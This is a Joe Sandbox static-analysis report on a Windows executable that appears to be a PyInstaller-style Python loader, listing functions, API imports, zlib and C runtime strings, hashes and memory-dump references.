Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 5342f01ee196edad322f7948b060a1544372fe1dcfc237a6954b270ff4244d32
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: A4F0FE10F0938AC5FE5467617851679A2B05FD4BA4F094734DD2ECD3D5DE6EA4408DA0

Non-executed Functions

Function 00007FF666DD5820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD5830
GetLastError.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD5842
GetProcAddress.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD5879
GetLastError.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD588B
GetProcAddress.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD58A4
GetLastError.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD58B6
GetProcAddress.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD58CF
GetLastError.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD58E1
GetProcAddress.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD58FD
GetLastError.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD590F
GetProcAddress.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD592B
GetLastError.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD593D
GetProcAddress.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD5959
GetLastError.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD596B
GetProcAddress.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD5987
GetLastError.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD5999
GetProcAddress.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD59B5
GetLastError.KERNEL32(?,00007FF666DD64BF,?,00007FF666DD336E), ref: 00007FF666DD59C7

Strings

PyEval_EvalCode, xrefs: 00007FF666DD5BA5, 00007FF666DD5BC7
PyObject_Str, xrefs: 00007FF666DD5D9F, 00007FF666DD5DC1
PyUnicode_Replace, xrefs: 00007FF666DD5FC7, 00007FF666DD5FE9
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF666DD5DCD, 00007FF666DD5DEF
PyImport_AddModule, xrefs: 00007FF666DD5BD3, 00007FF666DD5BF5
PyUnicode_AsUTF8, xrefs: 00007FF666DD5EB3, 00007FF666DD5ED5
PyStatus_Exception, xrefs: 00007FF666DD5E29, 00007FF666DD5E4B
PyUnicode_DecodeFSDefault, xrefs: 00007FF666DD5F0F, 00007FF666DD5F31
PyConfig_Clear, xrefs: 00007FF666DD597D, 00007FF666DD599F
PyImport_ExecCodeModule, xrefs: 00007FF666DD5C01, 00007FF666DD5C23
Py_PreInitialize, xrefs: 00007FF666DD594F, 00007FF666DD5971
Failed to get address for %hs, xrefs: 00007FF666DD5851
PyObject_GetAttrString, xrefs: 00007FF666DD5D43, 00007FF666DD5D65
PyUnicode_Join, xrefs: 00007FF666DD5F99, 00007FF666DD5FBB
PyConfig_Read, xrefs: 00007FF666DD59D9, 00007FF666DD59FB
PyUnicode_FromFormat, xrefs: 00007FF666DD5F3D, 00007FF666DD5F5F
PyConfig_InitIsolatedConfig, xrefs: 00007FF666DD59AB, 00007FF666DD59CD
PyUnicode_Decode, xrefs: 00007FF666DD5EE1, 00007FF666DD5F03
PyConfig_SetString, xrefs: 00007FF666DD5A35, 00007FF666DD5A57
PyObject_SetAttrString, xrefs: 00007FF666DD5D71, 00007FF666DD5D93
Py_DecodeLocale, xrefs: 00007FF666DD586F, 00007FF666DD5891
PyErr_Print, xrefs: 00007FF666DD5B49, 00007FF666DD5B6B
Py_DecRef, xrefs: 00007FF666DD5826, 00007FF666DD5848
GetProcAddress, xrefs: 00007FF666DD5858
PyErr_Clear, xrefs: 00007FF666DD5A91, 00007FF666DD5AB3
PyConfig_SetWideStringList, xrefs: 00007FF666DD5A63, 00007FF666DD5A85
PyRun_SimpleStringFlags, xrefs: 00007FF666DD5DFB, 00007FF666DD5E1D
PyErr_Fetch, xrefs: 00007FF666DD5ABF, 00007FF666DD5AE1
PyErr_Occurred, xrefs: 00007FF666DD5B1B, 00007FF666DD5B3D
PyMem_RawFree, xrefs: 00007FF666DD5C8B, 00007FF666DD5CAD
Py_ExitStatusException, xrefs: 00007FF666DD589A, 00007FF666DD58BC
PyConfig_SetBytesString, xrefs: 00007FF666DD5A07, 00007FF666DD5A29
PyModule_GetDict, xrefs: 00007FF666DD5CB9, 00007FF666DD5CDB
PyErr_NormalizeException, xrefs: 00007FF666DD5AED, 00007FF666DD5B0F
Py_InitializeFromConfig, xrefs: 00007FF666DD58F3, 00007FF666DD5915
PyObject_CallFunctionObjArgs, xrefs: 00007FF666DD5D15, 00007FF666DD5D37
PyImport_ImportModule, xrefs: 00007FF666DD5C2F, 00007FF666DD5C51
PySys_SetObject, xrefs: 00007FF666DD5E85, 00007FF666DD5EA7
PySys_GetObject, xrefs: 00007FF666DD5E57, 00007FF666DD5E79
PyErr_Restore, xrefs: 00007FF666DD5B77, 00007FF666DD5B99
PyMarshal_ReadObjectFromString, xrefs: 00007FF666DD5C5D, 00007FF666DD5C7F
Py_IsInitialized, xrefs: 00007FF666DD5921, 00007FF666DD5943
Py_Finalize, xrefs: 00007FF666DD58C5, 00007FF666DD58E7
PyObject_CallFunction, xrefs: 00007FF666DD5CE7, 00007FF666DD5D09
PyUnicode_FromString, xrefs: 00007FF666DD5F6B, 00007FF666DD5F8D

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 8caa347a3eb9efd84dc8dec3c17caf97ba4a9d5b87f705895c2b5ede2cd8b37c
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: AE22DF34A0DB47D1FA14ABA6B9105B423B1EF99785F441235D82E8E3A0FF7EB1589F00

Function 00007FF666DF411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF666DF416A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF47D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF494C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF4C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF4E2A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF5067
memcpy_s.LIBCPMT ref: 00007FF666DF5142
memcpy_s.LIBCPMT ref: 00007FF666DF51ED
memcpy_s.LIBCPMT ref: 00007FF666DF52BC

Strings

1#IND, xrefs: 00007FF666DF4257
1#INF, xrefs: 00007FF666DF4293
1#QNAN, xrefs: 00007FF666DF4283
1#SNAN, xrefs: 00007FF666DF427A

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction ID: fff54cef59b6fa16d44a8b0949ef99b744b25ce2620813efa29741cfc84562e9
Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction Fuzzy Hash: B5B2C372E18292CBE7648E64E6407FD77B1FB94388F545235DA0D9FA85DF3AA9008F40

Function 00007FF666DDAD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid distance too far back, xrefs: 00007FF666DDB6E0
invalid literal/length code, xrefs: 00007FF666DDB452
invalid code -- missing end-of-block, xrefs: 00007FF666DDB136
invalid bit length repeat, xrefs: 00007FF666DDB109
too many length or distance symbols, xrefs: 00007FF666DDAEB6
invalid distances set, xrefs: 00007FF666DDB210
invalid literal/lengths set, xrefs: 00007FF666DDB1A3
invalid code lengths set, xrefs: 00007FF666DDAE9D
invalid distance code, xrefs: 00007FF666DDB624

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction ID: 7411fa6587c3e508ac58842f0b21ea3f45263f2bd1e7b3ac4df98a95fa555195
Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction Fuzzy Hash: 6F52C372A146A68BD7A49E24E458B7D3BB9EB44344F058239E64A8F7C0DF3ED844CF40

Function 00007FF666DDD19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF666DDD1B8
RtlCaptureContext.KERNEL32 ref: 00007FF666DDD1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF666DDD1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF666DDD240
IsDebuggerPresent.KERNEL32 ref: 00007FF666DDD294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF666DDD2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF666DDD2BC

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: d332dff316d3b3dc048337f2546d83cbc096e8683863eb8cd0376dd99773bf7d
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: D4311C72609A81C6EB609F60E8803EE7374FB84748F44453ADA4D8FB95EF39D648CB10

Function 00007FF666DEA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF666DEA6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF666DEA715
RtlVirtualUnwind.KERNEL32 ref: 00007FF666DEA750
IsDebuggerPresent.KERNEL32 ref: 00007FF666DEA789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF666DEA793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF666DEA79E

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: d406333745ee1e1ff24a6c80008ee2bec2525106f9ed154edec454f913b605cb
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 93315132618B81C6DB60DF25E8402AE73B4FB85758F540235EA9D8BB99DF3DC5458F00

Function 00007FF666DF18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF1930
FindFirstFileExW.KERNEL32 ref: 00007FF666DF1A3A

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction ID: d90a567503dce5d8f736ea363f1339116f0e9fc8c30eff2a7d52fa83fc24144f
Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction Fuzzy Hash: 6FB1A672B18692C1EA619B21BC105B9A3B1EB85BE4F445331DE5D8FBC5EE3EE441CB00

Function 00007FF666DDD080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF666DDD0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF666DDD0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF666DDD0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF666DDD0D6

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: 837af78228fdcfc93e7bb84750ddec8aeeb4e424544bd6ca61a5dfecd8b2e644
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 9D111C26B18F05CAEB00CB60F8552A933B4FB59758F440E31EA6D8A7A4EF79D5648780

Function 00007FF666DF3C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF666DF3CE6
memcpy_s.LIBCPMT ref: 00007FF666DF3D11

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 631256d7434b15bca4ce0a4fd65197a623fb27035d7d684026143fb9107b6b8c
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: FFC1B172A18686C7E7248F1AB14466AB7A1FBD4784F468235DB4A8B744DF3EED01CB40

Function 00007FF666DDA4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF666DDA991
, xrefs: 00007FF666DDA5CB
unknown header flags set, xrefs: 00007FF666DDA535

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction ID: c3d7711e3cad9fb82442ae9b6ddcbd586f992b676f34500ebc1e5b9b18045d39
Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction Fuzzy Hash: 35F16462A183D5C7E795AF15D088B3A3AB9EF44744F0A8634DA498F790CF3AD541CF40

Function 00007FF666DF9798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF666DF99E7
RaiseException.KERNEL32 ref: 00007FF666DF99F8

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction ID: 7fc05d0f8579c338cf9b14c92d9bc5921c4c58c254f28a9134ddc2765accb859
Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction Fuzzy Hash: 35B11773A04B89CAEB15CF29D4463687BB0F784B48F158A35DA5D8B7A4CF3AD451CB00

Function 00007FF666DE3A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF666DE3DC4
, xrefs: 00007FF666DE3B82

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction ID: e368f3ec9c4ec22ac36af5a242a06e83c445e34aba8a5f199e6a285a00ab839b
Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction Fuzzy Hash: EEE19636A08A86C6EB688E15E15053DB3B0FF45B48F165335DA4E8F6A4DF2BEC51CB40

Function 00007FF666DDA34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

incorrect header check, xrefs: 00007FF666DDA4CB
invalid window size, xrefs: 00007FF666DDA4B2

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction ID: 5fe1f55416326c0880244bd3626dcf883871b96629362f8f1789639920294fed
Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction Fuzzy Hash: 42917772A182C6C7E7A59A14E458B3E3AB9FB44354F159239DA5A8E7C0CF3AE540CF40

Function 00007FF666DEDF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF666DEE06D
gfff, xrefs: 00007FF666DEE0EA

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
